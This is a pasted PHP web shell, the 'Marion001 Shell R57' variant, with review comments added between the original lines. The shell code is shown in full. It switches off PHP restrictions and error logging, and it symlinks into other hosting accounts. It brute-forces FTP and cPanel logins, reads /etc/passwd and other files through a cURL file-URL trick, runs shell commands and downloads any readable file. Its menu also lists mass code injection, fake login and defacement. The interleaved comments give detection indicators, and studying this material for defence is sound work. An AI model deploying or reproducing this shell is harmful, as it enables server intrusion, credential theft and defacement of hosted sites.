
Pack shell r57

By: a guest on February 3, 2016  |  syntax: PHP  |  size: 125.0 KB  |  hits: 42  |  expires: never
  1. <?php
  2. $head = '
  3. <html><head></script><title>Marion001 Shell R57</title>
  4. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  5. <STYLE>
  6. body {
  7. font-family: Tahoma
  8. }
  9. tr {
  10. BORDER-RIGHT:  #Black 1px solid;
  11. BORDER-TOP:    Black 1px solid;
  12. BORDER-LEFT:   Black 1px solid;
  13. BORDER-BOTTOM: #Black 1px solid;
  14. BORDER-COLOR: #008082;
  15. color: #d8d8d8;
  16. }
  17. td {
  18. BORDER-RIGHT:  #Black 1px solid;
  19. BORDER-TOP:    Black 1px solid;
  20. BORDER-LEFT:   Black 1px solid;
  21. BORDER-BOTTOM: #Black 1px solid;
  22. BORDER-COLOR: #008082;
  23. color: #d8d8d8;
  24. }
  25. .table1 {
  26. BORDER: 0px;
  27. BORDER-COLOR: #008082;
  28. BACKGROUND-COLOR: Black;
  29. color: #d8d8d8;
  30. }
  31. .td1 {
  32. BORDER: 0px;
  33. BORDER-COLOR: #008082;
  34. font: 7pt Tahoma;
  35. color: #d8d8d8;
  36. }
  37. .tr1 {
  38. BORDER: 0px;
  39. BORDER-COLOR: #008082;
  40. color: #d8d8d8;
  41. }
  42. table {
  43. BORDER:  Black 1px outset;
  44. BORDER-COLOR: #008082;
  45. BACKGROUND-COLOR: Black;
  46. color: #d8d8d8;
  47. }
  48. input {
  49. border                  : solid 1px;
  50. border-color            : #2aff00 #2aff00 #2aff00 #2aff00;
  51. BACKGROUND-COLOR: Black;
  52. font: 8pt Tahoma;
  53. color: #d8d8d8;
  54. }
  55. select {
  56. BORDER-RIGHT:  Black 1px solid;
  57. BORDER-TOP:    #2aff00 1px solid;
  58. BORDER-LEFT:   #2aff00 1px solid;
  59. BORDER-BOTTOM: Black 1px solid;
  60. BORDER-color: #d8d8d8;
  61. BACKGROUND-COLOR: Black;
  62. font: 8pt Tahoma;
  63. color: Red;
  64. }
  65. submit {
  66. BORDER:  buttonhighlight 2px outset;
  67. BACKGROUND-COLOR: Black;
  68. width: 30%;
  69. color: #d8d8d8;
  70. }
  71. textarea {
  72. BORDER-RIGHT:  Black 1px solid;
  73. BORDER-TOP:    #2aff00 1px solid;
  74. BORDER-LEFT:   #2aff00 1px solid;
  75. BORDER-BOTTOM: Black 1px solid;
  76. BORDER-COLOR: #008082;
  77. BACKGROUND-COLOR: Black;
  78. font: Fixedsys bold;
  79. color: #d8d8d8;
  80. }
  81. BODY {
  82.         SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #d8d8d8; SCROLLBAR-SHADOW-color: #d8d8d8; SCROLLBAR-3DLIGHT-color: #d8d8d8; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #d8d8d8; SCROLLBAR-DARKSHADOW-color: #d8d8d8
  83. margin: 1px;
  84. color: Red;
  85. background-color: Black;
  86. }
  87. .main {
  88. margin                  : -287px 0px 0px -490px;
  89. border                  : #2aff00 solid 1px;
  90. BORDER-COLOR: #005d5e;
  91. }
  92. .tt {
  93. background-color: Black;
  94. }
  95.  
  96. A:link {
  97.         COLOR: White; TEXT-DECORATION: none
  98. }
  99. A:visited {
  100.         COLOR: White; TEXT-DECORATION: none
  101. }
  102. A:hover {
  103.         color: Red; TEXT-DECORATION: none
  104. }
  105. A:active {
  106.         color: Red; TEXT-DECORATION: none
  107. }
  108. </STYLE><script language=\'javascript\'>
  109. function hide_div(id)
  110. {
  111.  document.getElementById(id).style.display = \'none\';
  112.  document.cookie=id+\'=0;\';
  113. }
  114. function show_div(id)
  115. {
  116.  document.getElementById(id).style.display = \'block\';
  117.  document.cookie=id+\'=1;\';
  118. }
  119. function change_divst(id)
  120. {
  121.  if (document.getElementById(id).style.display == \'none\')
  122.    show_div(id);
  123.  else
  124.    hide_div(id);
  125. }
  126. </script>';
  // Operator-login configuration for the shell's built-in gate.
  // 'security' is false here, so the `if ($info['security'])` check further down never
  // renders the login form: every handler in this file is reachable without credentials.
  127. $info['security'] = false;
  // 32-hex-character values that the login handler compares against md5() of the
  // submitted uname/pword, i.e. MD5 digests of the operator credentials. They are
  // fixed strings in the file and so usable as static hunting indicators for this sample.
  128. $info['uname'] = "1ec47363cf1e60f632dd14139989b813";
  129. $info['pword'] = "4297f44b13955235245b2497399d7a93";
  // Operator handle; the tools page prints it as "Login As (...)".
  130. $info['title'] = "TheSunOfVN";
  131. $info['ownsessions'] = false;
  // Copy each default into $tacfg unless a value is already present there.
  // NOTE(review): $tacfg is not initialised in the visible listing; confirm where it comes from.
  132. foreach ($info as $key => $val) {
  133.   if (!isset($tacfg[$key])) $tacfg[$key] = $val;
  134. }
  // Session and cookie handling for the login gate.
  // The session name 'txtauth' and the cookie prefix 'txtauth_' show up in request and
  // response headers, which makes them usable as proxy/WAF-side indicators.
  // NOTE(review): $rmgroup is never assigned in the visible listing, so the cookie name
  // is presumably just 'txtauth_'; confirm against the full sample.
  135. if (!$tacfg['ownsessions']) {
  136.   session_name('txtauth');
  137. }
  138. if (isset($_GET['logout']) || isset($_POST['logout'])) {
  // Logout: expire the remember-me cookie and clear the session flag.
  139.   setcookie('txtauth_'.$rmgroup, '', time()-86400*14);
  140.   if (!$tacfg['ownsessions']) {
  141.     $_SESSION = array();
  142.   }
  143.   else $_SESSION['txtauthin'] = false;
  // NOTE(review): system32() is not defined in the visible listing; it is passed the
  // host and request URI, so presumably a redirect helper; confirm.
  144.   system32($_SERVER['HTTP_HOST'],$_SERVER['REQUEST_URI']);
  145. }
  146. elseif (isset($_POST['login'])) {
  // Login: MD5 both submitted fields and compare them with the configured digests.
  147.         $uname = md5($_POST['uname']);
  148.         $upass = md5($_POST['pword']);
  149.   if ($uname == $tacfg['uname'] && $upass == $tacfg['pword']) {
  150.     $_SESSION['txtauthin'] = true;
  151.     if ($_POST['rm']) {
  // Remember-me cookie: MD5 over the two configured digests, 14-day lifetime.
  152.       setcookie('txtauth_'.$rmgroup, md5($tacfg['uname'].$tacfg['pword']), time()+86400*14);
  153.     }
  154.   }
  155.   else $err = 'Login Failed !';
  156.   system32($_SERVER['HTTP_HOST'],$_SERVER['REQUEST_URI']);
  157. }
  158. elseif (isset($_COOKIE['txtauth_'.$rmgroup])) {
  // Cookie login is honoured only when $tacfg['allowrm'] is truthy.
  // NOTE(review): no 'allowrm' default is set in the $info block above; confirm.
  159.         if (md5($tacfg['uname'].$tacfg['pword']) == $_COOKIE['txtauth_'.$rmgroup] && $tacfg['allowrm']) {
  160.                 $_SESSION['txtauthin'] = true;
  161.         }
  162.         else $err = 'Login Failed !';
  163. }
  // Login gate: runs only when $info['security'] is true and the session flag is unset;
  // it prints the login form and exits, so nothing below is reached unauthenticated.
  164. if ($info['security']) {
  165. if (!$_SESSION['txtauthin']) {
  // Resets PHP restriction settings to their startup values and switches off PHP error
  // logging for this request; every call is @-silenced.
  // For responders: requests to this script may leave no PHP error-log trace, so the
  // web server's access log is the more reliable record.
  166. @ini_restore("safe_mode");
  167. @ini_restore("open_basedir");
  168. @ini_restore("safe_mode_include_dir");
  169. @ini_restore("safe_mode_exec_dir");
  170. @ini_restore("disable_functions");
  171. @ini_restore("allow_url_fopen");
  172. @ini_set('error_log',NULL);
  173. @ini_set('log_errors',0);
  174. echo $head;
  175. ?>
  176. <body><br><br><div style="font-size: 14pt;" align="center">Marion001 R57 shell</div><hr width="300" size="1" noshade color="#cdcdcd"><p><p>
  177. <?
  // Build the form's action URL from the request URI with any logout=1 parameter removed.
  // The template below uses short open tags (`<?`, `<?=`); the `<?` blocks only execute
  // where short_open_tag is enabled.
  178. if (isset($_SERVER['REQUEST_URI'])) $action = $_SERVER['REQUEST_URI'];
  179. else $action = $_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];
  180. if (strpos($action, 'logout=1', strpos($action, '?')) !== false) $action = str_replace('logout=1', '', $action);
  181. ?>
  182. <form name="txtauth" action="<?=$action?>" method="post">
  183. <div align="center">
  184. <table border="0" cellpadding="4" cellspacing="0" bgcolor="#666666" style="border: 1px double #dedede;" dir="ltr">
  185. <?=(isset($err))?'<tr><td colspan="2" align="center"><font color="red">'.$err.'</font></td></tr>':''?>
  186. <?if (isset($tacfg['uname'])) {?>
  187. <tr><td>User:</td><td><input type="text" name="uname" value="" size="20" maxlength="100" class="txtbox"></td></tr>
  188. <?}?>
  189. <tr><td>Password:</td><td><input type="password" name="pword" value="" size="20" maxlength="100" class="txtbox"></td></tr>
  190. <?if ($tacfg['allowrm']) {?>
  191. <tr><td align="left"><input type="submit" name="login" value="Login">
  192. </td><td align="right"><input type="checkbox" name="rm" id="rm"><label for="rm"> Remmeber Me?</label></td></tr>
  193. <?} else {?>
  194. <tr><td colspan="2" align="center"><input type="submit" name="login" value="Login"></td></tr><?}?>
  195. </table></div></form><br><br><hr width="300" size="1" noshade color="#cdcdcd">
  196. <div class="smalltxt" align="center"><b>Edited by TheSunOfVN</b></div></body></html>
  197. <?
  198.         exit();
  199.         }
  200. }
  // Handler for ?ln: reads users.txt from the working directory, takes the text before
  // ":x:" on each passwd-style line as an account name, and shells out to create a
  // symlink named after the account that points at /home/<account>/public_html/.
  // The account name is interpolated into the system() command line unquoted.
  // Defender notes: on shared hosting, a users.txt file next to a cluster of symlinks
  // into other accounts' public_html is the on-disk trace of this handler. Apache's
  // SymLinksIfOwnerMatch option and listing system() in disable_functions limit it.
  201. if (isset($_GET['ln'])) {
  202. $fp = fopen('users.txt','r');
  203. $fr = fread($fp,filesize('users.txt'));
  204. fclose($fp);
  205. preg_match_all('/(.+?):x:(.+?)/',$fr,$explode);
  206. foreach($explode[1] as $user) {
  207. system("ln -s /home/$user/public_html/ $user");
  208. }
  209. header("Location: ".$_SERVER['PHP_SELF']);
  210. }
  211. if (isset($_GET['brute'])) {
  212. ?><html><head><meta http-equiv="Content-Language" content="en-us"></head>
  213. <title> BruteForcer v1.0 </title><style>
  214. body{margin:0px;font-style:normal;font-size:10px;color:#fff;font-family:Verdana,Arial;background-color:#000;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}
  215. input,
  216. .kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
  217. button{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
  218. body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
  219. a:active { outline: none; }
  220. a:focus { -moz-outline-style: none; }
  221. table {
  222.   border: 2px dashed #fff;
  223.   background:#000;
  224.   color: #fff;
  225.   font-weight: bold;
  226.   font-family:"Comic Sans MS";
  227.   }
  228. </style><style type='text/css'>
  229.   <!--
  230.        A:link {text-decoration: none; color:#cccccc }
  231.        A:visited {text-decoration: none; color:#cccccc }
  232.        a:hover {text-decoration: none; color:Red}
  233.   -->
  234. </style>
  235. <?php
  236. @ini_set('memory_limit', 1000000000000);
  237. $connect_timeout=5;
  238. $submit = $_REQUEST['submit'];
  239. $users = $_REQUEST['users'];
  240. $pass = $_REQUEST['passwords'];
  241. $target = $_REQUEST['target'];
  242. $option = $_REQUEST['option'];
  243. $thesunofvn = $_GET['thesunofvn'];
  244. if($target == ''){
  245. $target = 'localhost';
  246. }
  247. ?>
  248. <?php
  249.  print "<br><br><br><center><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='70%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td width='70%'>
  250. <br><b><center><a href='?brute&thesunofvn=crack'> brute </a> -
  251. <a href='?brute&thesunofvn=listuser1'> Get users </a> -  
  252. <a href='?brute&thesunofvn=bypass'> Bypass </a> -
  253. <font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]
  254. <br><br></center></td></tr></table>";
  255. if( $thesunofvn == 'crack'){
  256. @ini_set('memory_limit', 1000000000000);
  257. $connect_timeout=5;
  258. $submit = $_REQUEST['submit'];
  259. $users = $_REQUEST['users'];
  260. $pass = $_REQUEST['passwords'];
  261. $target = $_REQUEST['target'];
  262. $option = $_REQUEST['option'];
  263. if($target == ''){
  264. $target = 'localhost';
  265. }
  266. print " <div align='center'>
  267. <form method='post' style='border: 1px solid #000000'><br><br>
  268. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td>
  269. <b> Target  : </font><input type='text' name='target' size='16' value= $target style='border: font-family:Verdana; font-weight:bold;'></p></font></b></p>
  270. <div align='center'><br>
  271. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
  272. <tr><td align='center'><b>Username</b></td><td><p align='center'><b>Password</b></td></tr></table><p align='center'>
  273. <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$users</textarea>
  274. <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>123pass
  275. pass123</textarea><br><br>                        
  276. <b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
  277. <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='brute' name='submit' ></p>
  278. </td></tr></table></td></tr></form><p align= 'left'>";
  279. ?>
  280. <?php
  // ftp_check: attempts a single FTP login to $host with $user/$pass through cURL and,
  // when curl_errno() is 0, prints the pair plus an ftp:// link that embeds the
  // credentials. curl_errno() 28 is cURL's timeout code; $timeout is the connect timeout.
  // $user, $pass and $host are printed into the HTML without escaping.
  // Defender notes: the target defaults to 'localhost' in the surrounding code, so on the
  // FTP side this shows up as a burst of failed logins across many accounts from the web
  // server's own address. Login rate limiting or lockout on FTP is the relevant control.
  // NOTE(review): the braces in this function do not balance as pasted, so the sample may
  // not parse as-is; rely on static indicators rather than on detonating it.
  281. function ftp_check($host,$user,$pass,$timeout){
  282. $ch = curl_init();
  283. curl_setopt($ch, CURLOPT_URL, "ftp://$host");
  284. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  285. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  286. curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  287. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  288. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  289. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  290. $data = curl_exec($ch);
  291. if ( curl_errno($ch) == 28 ) {
  292. print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
  293. elseif ( curl_errno($ch) == 0 ){
  294. if ($host == 'localhost') {
  295. $link = "ftp://$user:$pass@".$_SERVER['SERVER_ADDR'];
  296. } else {
  297. $link = "ftp://$user:$pass@".$host;
  298. }
  299. print "<b><font color=Red> $user </font> | <font color=Red> $pass </font> [ <a href='$link'>$link</a> ]</b><br>";}curl_close($ch);}
  // cpanel_check: sends one HTTP Basic-auth request to http://$host:2082 with
  // $user/$pass through cURL and, when curl_errno() is 0, prints the pair plus a link
  // that embeds the credentials. CURLOPT_FAILONERROR makes HTTP error statuses count as
  // failures; curl_errno() 28 is cURL's timeout code.
  // Defender notes: on the control-panel side this appears as many Basic-auth failures
  // against port 2082 from the web server's own address, since the target defaults to
  // 'localhost' in the surrounding code. Authentication lockout or rate limiting applies.
  // NOTE(review): the braces in this function do not balance as pasted, so the sample may
  // not parse as-is; rely on static indicators rather than on detonating it.
  300. function cpanel_check($host,$user,$pass,$timeout){
  301. $ch = curl_init();
  302. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  303. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  304. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  305. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  306. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  307. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  308. $data = curl_exec($ch);
  309. if ( curl_errno($ch) == 28 ) {
  310. print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
  311. elseif ( curl_errno($ch) == 0 ){
  312. if ($host == 'localhost') {
  313. $link = "http://$user:$pass@".$_SERVER['SERVER_ADDR'].":2082";
  314. } else {
  315. $link = "http://$user:$pass@".$host.":2082";
  316. }
  317. print "<b><font color=Red> $user </font> | <font color=Red> $pass </font> [ <a href='$link'>$link</a> ]</b><br>";}curl_close($ch);}
  318. if(isset($submit) && !empty($submit)){
  319. $userlist = explode ("\n" , $users );
  320. $passlist = explode ("\n" , $pass );
  321. print "<b>[ Start : ]# Attacking ...</font></b><br><br>";
  322. foreach ($userlist as $user) {
  323. $_user = trim($user);
  324. foreach ($passlist as $password ) {
  325. $_pass = trim($password);
  326. if($option == "ftp"){
  327. ftp_check($target,$_user,$_pass,$connect_timeout);
  328. }
  329. if ($option == "cpanel")
  330. {
  331. cpanel_check($target,$_user,$_pass,$connect_timeout);
  332. }
  333. }
  334. }
  335. print "<br><b>[ Now : ]# F!nish3d ...</font></b><br>";
  336. }
  337. exit();
  338. }elseif ( $thesunofvn == 'listuser1'){
  // "Get users" branch: reads a server-side file named in the POST body (the form
  // pre-fills /etc/passwd) through cURL's file handler and lists the account names found.
  339. echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>";
  340. echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="50" value="/etc/passwd"><input type="submit" name="hardstylez" value="grab !"></form>';
  341. $file = $_POST['file'];
  342. $level=0;
  // Creates a directory literally named "file:" under the working directory, then one
  // nested directory per component of the requested path, and walks back up afterwards.
  // Presumably this shapes the "file:file:///" URL below to pass a path check in older
  // PHP/cURL builds; confirm against the PHP version in use.
  // Defender notes: no cleanup is visible here, so a leftover "file:" directory tree
  // mirroring a system path beneath a web root is an on-disk artefact of this branch.
  343. if(!file_exists("file:"))
  344. @mkdir("file:");
  345. @chdir("file:");
  346. $level++;
  347. $hardstyle = @explode("/", $file);
  348. for($a=0;$a<count($hardstyle);$a++){
  349.     if(!empty($hardstyle[$a])){
  350.         if(!file_exists($hardstyle[$a]))
  351.             @mkdir($hardstyle[$a]);
  352.         @chdir($hardstyle[$a]);
  353.         $level++;
  354.     }
  355. }
  356. while($level--) chdir("..");
  357. $ch = curl_init();
  358. curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
  359. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  360. $result = curl_exec($ch);
  361. echo "<textarea rows='30' cols='120' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
  362. if ($result == FALSE)
  363. { die("Failed!");
  364. } else {
  // Print only the text before ":x:" on passwd-style lines; otherwise dump the raw content.
  365. if (preg_match_all('/(.+?):x:(.+?)/',$result,$explode)) {
  366. foreach($explode[1] as $user) {echo $user."\n";}
  367. } else { echo $result;}
  368. }
  369. echo ' </textarea> </FONT>';
  370. print '</table>';
  371. exit();
  372. }
  373. elseif ( $thesunofvn == 'bypass'){echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%'bgColor=#303030
  374. borderColorLight=#966117 border=1><tr><td>";
  375. echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="100" value="'.htmlspecialchars($file).'">
  376. <input type="submit" name="hardstylez" value="get !"></form>';
  377. $file = $_POST['file'];
  378. $level=0;
  379. if(!file_exists("file:"))
  380.     @mkdir("file:");
  381. @chdir("file:");
  382. $level++;
  383. $hardstyle = @explode("/", $file);
  384. for($a=0;$a<count($hardstyle);$a++){
  385.     if(!empty($hardstyle[$a])){
  386.         if(!file_exists($hardstyle[$a]))
  387.             @mkdir($hardstyle[$a]);
  388.         @chdir($hardstyle[$a]);
  389.         $level++;
  390.     }
  391. }
  392. while($level--) chdir("..");
  393. $ch = curl_init();
  394. curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
  395. echo "<textarea rows='30' cols='120' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
  396. if(FALSE==curl_exec($ch))
  397. die('Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
  398. echo ' </textarea> </FONT>';
  399. print '</table>';}
  400.  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  401. exit();
  402. }
  403. if(isset($_GET['tools'])) {
  404. if ($info['security']) echo $head."<body>Login As (<font color='#FF0000'>".$info['title']."</font>) <a href='?logout=1'>Logout</a></p>";
  405. else echo $head;
  406. echo "<center><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#FFFFFF cellPadding=5 width='70%' bgColor=#303030 borderColorLight=#FFFFFF border=1><tr><td width='70%'>
  407. <br><b><center>
  408. <a href='?tools&act=encoder'> Encoder </a> - <a href='?tools&act=fsbuff'> Buffer </a> - <a href='?tools&act=selfremove'> Self Remove </a> -
  409. <a href='?tools&act=massbrowsersploit'> Mass Code Injection </a> -
  410. <a href='?tools&act=fakelogin'> Fake Login </a> - <a href='?tools&act=deface'>Vbulletin Deface</a><br><br></center></td></tr></table>";
  411. $nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
  412. $sf="<form method=post>";$ef="</form>";
  413. $st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
  414. $et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
  415. $c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
  416. $sta="<textarea cols=157 rows=23>";$eta="</textarea>";
  417. $sfnt="<font face=tahoma size=2 color=#008080>";$efnt="</font>";
  418. if(version_compare(phpversion(), '4.1.0') == -1)
  419.  {$_POST   = &$HTTP_POST_VARS;$_GET    = &$HTTP_GET_VARS;
  420.  $_SERVER = &$HTTP_SERVER_VARS;
  421.  }function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
  422. if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
  423. elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
  424. else{return $requ."?".$link."=".$val;}}
  425. function delm($delmtxt){print"<center><table bgcolor=black style='border:1px solid olive' width=99% height=2%>";print"<tr><td><b><center><font size=2 color=olive>$delmtxt</td></tr></table></center>";}
  // callfuncs: command-execution helper. Passes $cmnd to shell_exec(), exec(), popen()
  // or system() depending on the function_exists() checks and prints the output after
  // htmlspecialchars().
  // The function names are passed to function_exists() as bare words rather than
  // strings, which points at legacy PHP as the intended runtime.
  // Defender notes: listing these four functions in disable_functions removes the
  // primitives this helper relies on; process telemetry showing the web server or PHP
  // worker spawning a shell is the host-side signal.
  426. function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
  427. $nscmd=htmlspecialchars($scmd);print $nscmd;}
  428. elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
  429. $ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
  430. elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
  431. while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
  432. print $res;}pclose($pcmd);}elseif(!function_exists(popen)){
  433. ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
  434. print htmlspecialchars($pret);}}
  435. function input($type,$name,$value,$size)
  436. {if (empty($value)){print "<input type=$type name=$name size=$size>";}
  437. elseif(empty($name)&($size)){print "<input type=$type value=$value >";}
  438. elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
  439. else {print "<input type=$type name=$name value=$value size=$size >";}}
  440. function permcol($path){if (is_writable($path)){print "<font color=olive>";
  441. callperms($path); print "</font>";}
  442. elseif (!is_readable($path)&&!is_writable($path)){print "<font color=red>";
  443. callperms($path); print "</font>";}
  444. else {print "<font color=white>";callperms($path);}}
  445. if ($dlink=="dwld"){download($_REQUEST['dwld']);}
  // download: streams the file at $dwfile to the client as an attachment and exits.
  // The only visible caller passes $_REQUEST['dwld'], so any file readable by the PHP
  // process can be retrieved; the path is also placed unescaped into response headers.
  // Defender notes: responses from a PHP script with Content-Type
  // "application/force-download" and requests carrying a `dwld` parameter are the
  // log-side indicators of file exfiltration through this helper.
  446. function download($dwfile) {$size = filesize($dwfile);
  447. @header("Content-Type: application/force-download;name=$dwfile");
  448. @header("Content-Transfer-Encoding: binary");
  449. @header("Content-Length: $size");
  450. @header("Content-Disposition: attachment; filename=$dwfile");
  451. @header("Expires: 0");
  452. @header("Cache-Control: no-cache, must-revalidate");
  453. @header("Pragma: no-cache");
  454. @readfile($dwfile); exit;}
  455. $nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
  456. $sf="<form method=post>";$ef="</form>";
  457. $st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
  458. $et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
  459. $c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
  460. $sta="<textarea cols=157 rows=23>";$eta="</textarea>";
  461. $sfnt="<font face=tahoma size=2 color=olive>";$efnt="</font>";
  462. print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";print "";
  463. if($_GET['act']=="encoder")
  464. {
  465.  echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
  466.  foreach(array("md5","crypt","sha1","crc32") as $v)
  467.  {
  468.   echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
  469.  }
  470.  echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
  471. <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
  472. <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
  473.  echo "<center>base64_decode - ";
  474.  if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
  475.  else
  476.  {
  477.   $debase64 = base64_decode($encoder_input);
  478.   $debase64 = str_replace("\0","[0]",$debase64);
  479.   $a = explode("\r\n",$debase64);
  480.   $rows = count($a);
  481.   $debase64 = htmlspecialchars($debase64);
  482.   if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
  483.   else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
  484.   echo " <a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
  485.  }
  486.  echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
  487.  $c = strlen($encoder_input);
  488.  for($i=0;$i<$c;$i++)
  489.  {
  490.   $hex = dechex(ord($encoder_input[$i]));
  491.   if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
  492.   elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
  493.  }
  494.  echo "\" readonly><br></form>";
  495. ?>
  496. </center><br><br><table border=0 align=center cellpadding=4><tr><td><center><b>Search milw0rm for MD5 hash</b></center></td><td>
  497. <center><b>Search md5encryption.com for MD5 or SHA1 hash</b></center></td><td><center><b>Search CsTeam for MD5 hash</b></center>
  498. </td></tr><tr><td><center><form target="_blank" action="http://www.milw0rm.com/cracker/search.php" method=POST>
  499. <input type=text size=40 name=hash> <input type=submit value="Submit"></form></center></td><td><center>
  500. <form target="_blank" action="http://www.md5encryption.com/?mod=decrypt" method=POST>
  501. <input type=text size=40 name=hash2word> <input type=submit value="Submit"></form>
